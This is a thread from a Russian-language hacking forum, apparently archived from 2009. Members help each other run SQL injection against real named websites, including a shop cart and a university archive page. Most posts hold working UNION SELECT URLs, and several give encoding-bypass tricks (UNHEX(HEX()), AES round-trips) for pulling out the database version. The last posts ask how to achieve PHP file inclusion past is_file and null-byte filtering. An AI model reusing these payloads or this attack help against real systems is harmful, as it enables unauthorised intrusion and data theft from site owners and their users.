ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.04.2009, 16:41
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от IDW
http://catalog.uvaga.by/model_mark/?go=-1+order+by+1--
А ты понаблюдай за запросом и поведением ошибки и сам попробуй понять можно или нет:
Код:
http://catalog.uvaga.by/model_mark/?go=-1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3,3' at line 1
Код:
http://catalog.uvaga.by/model_mark/?go=-10
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30,3' at line 1
Код:
http://catalog.uvaga.by/model_mark/?go=-100
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-300,3' at line 1
|
|
|
16.04.2009, 19:36
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 33
Провел на форуме:
140077
Репутация:
93
|
|
IDW, DrAssault
нету там скули
|
|
|
|
16.04.2009, 20:08
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от VITАL
IDW, DrAssault
нету там скули
Ну как же мы без тебя то не догадались у? Ошибка возникает из за того что значения лимита не может быть отрицательным вот и всё, естественно инъекцией и не пахло, я просто показал человеку как изменяется характер ошибки в результате тех или иных действий, хотелось чтобы он сам мозгами шевельнул, а не ты ему сказал, надеюсь это ясно!!!
|
|
|
|
16.04.2009, 22:54
|
|
Новичок
Регистрация: 14.04.2009
Сообщений: 1
Провел на форуме:
771
Репутация:
0
|
|
Люди есть такая вот проблема:
Если сайт шопа при попытке вывести багнутый столбец:
http://www.*****.co.uk/cart.php?c=-99999245+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,6 3,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79, 80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96 ,97,98,99,100--
Меня редиректит на страничку с картинкой на которой написано:
Sorry shop is turned off.
Помогите, может есть какойто другой способ вывода?
Спасибо
|
|
|
|
16.04.2009, 23:02
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Вывод в тайтле
http://www.groovycart.co.uk/cart.php?c=-9+union+select+1,version(),3,4,5,6,7,8,9,10,1,2,1, 1,1,1,1,1,19,20,1,2,3,24,5,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83 ,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,1 00,1,2,3,4,5,6,7,8,9,10,11,12,13--+
Последний раз редактировалось ElteRUS; 16.04.2009 в 23:05..
|
|
|
|
17.04.2009, 19:53
|
|
Новичок
Регистрация: 10.01.2007
Сообщений: 16
Провел на форуме:
109680
Репутация:
2
|
|
Код:
http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,2382,2383,2384,2385/*
где-то фильтр, пилит version() etc, на дает пробиться к from+information_schema |
|
|
|
17.04.2009, 20:04
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,unhex(hex(version())),2383,2384 ,2385/*
|
|
|
|
17.04.2009, 20:37
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
ILYAtirtir, хотя бы объяснили человеку почему так! =\
Nosfer, это не фильтр... Это проблемы с кодировкой... Так иногда бывает =\ для устранения этого можно применить как выше написали:
UNHEX(HEX(version())) ну или вместо version() что вы хотите вывести
или
AES_DECRYPT(AES_ENCRYPT(version(),1),1)
А вообще почитайте SQL injection полный FAQ
Некоторые вопросы отпадут =)
Последний раз редактировалось Kraneg; 17.04.2009 в 22:06..
|
|
|
|
18.04.2009, 14:27
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Вообщем есть файл
PHP код:
if(is_file($config['document_root'].'/templates/'.$config['template'].'/before.php')){
include($config['document_root'].'/templates/'.$config['template'].'/before.php');
}
перменные не опред..то есть их можно свободно передать...
Тут возможен только инклуд при Magic OFF ибо функция is_file не уязвима к замене нулл байта...Риальне ли каким нить макаром обмануть is_file ?...
Последний раз редактировалось DimOnOID; 18.04.2009 в 14:35..
|
|
|
|
18.04.2009, 13:26
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
есть ссылка вида http://site.ru/file=123
Подгружается фаил 123.txt
Как можно попробовать PHP подгрузить?
пробовал %00 он режет %0
пробовал %25 ничего не происходит..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид